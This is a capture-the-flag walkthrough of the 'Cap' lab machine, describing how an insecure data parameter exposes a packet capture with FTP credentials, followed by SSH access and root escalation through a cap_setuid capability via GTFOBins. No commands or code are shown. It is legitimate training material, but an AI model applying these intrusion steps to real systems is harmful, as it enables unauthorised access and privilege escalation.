Cap
Last updated
Last updated
Looks like a data analytics page that I am currently signed into as Nathan.
The dropdown menu page under the user doesn't do anything. All of the buttons including the Logout don't point towards anything or do anything.
Take a look at the source code:
There is a lot there but it looks like we have some new information:
We have a user named Nathan and possibly other users Rashed, Kaji Patha, and Ratul Hamba.
Checking out curl doesn't give us the version number of the gunicorn web server.
If we go to the home tab in the upper right and click on Network Status, we get some really good info about the machine without actually having to run an NMAP scan.
Looks like Ports 21, 22, and 80 are open.
When I try something in the search bar, nothing pops up but a parameter is added to the URL.
I captured a packet with Burpsuite and received the following.
Let's try the Security Snapshot button. This appears to grab some packet data over a 5 second period and creates a pcap file to look at.
We can also see that the URL shows a data parameter that after first use equals 1 and sequentially goes up. Let's set the parameter to 0 and see what it spits out. We'll also grab the pcap file from it.
We can open this pcap file in wireshark to take a look at it and see if we can find any good information.
WiresharkScanning through the Wireshark capture, we quickly find FTP credentials for the User Nathan.
We can now log into nathan's account, list out the current working directory, and download the user flag.
On our host system we can then look into the text file for the first flag.
The backend Language appears to be Python
Utilizes Gunicorn as a webserver
The Gunicorn "Green Unicorn" is a Python Web Server Gateway Interface HTTP server. It is a pre-fork worker model, ported from Ruby's Unicorn project. The Gunicorn server is broadly compatible with a number of web frameworks, simply implemented, light on server resources, and fairly fast.
None of these are new to me and don't provide any new information.
Now that we have credentials for nathan. We can spend some time exploring the target system for possible privilege escalation.
I'm going to use the credentials to log in through SSH.
Try checking out what sudo privileges we have.
Unfortunately, we have none so let's go digging around.
I spent some time digging around myself but didn't find anything. I decided to upload a copy of linpeas to the target account and perform some auto enumeration to help out.
I came across something interesting.
I can verify the capability functions with the following command. This essentially allows for certain processes to have root privleges. Similar to SUID.
This is great information as having the capabilities for cap_setuid set is a particularly vulnerable situation.
Hacktricks and GTFOBins both have sections for exploiting this for privilege escalation.
Let's go with the privilege escalation from GTFOBins.
And now I have root privileges.
Let's go get the root flag.
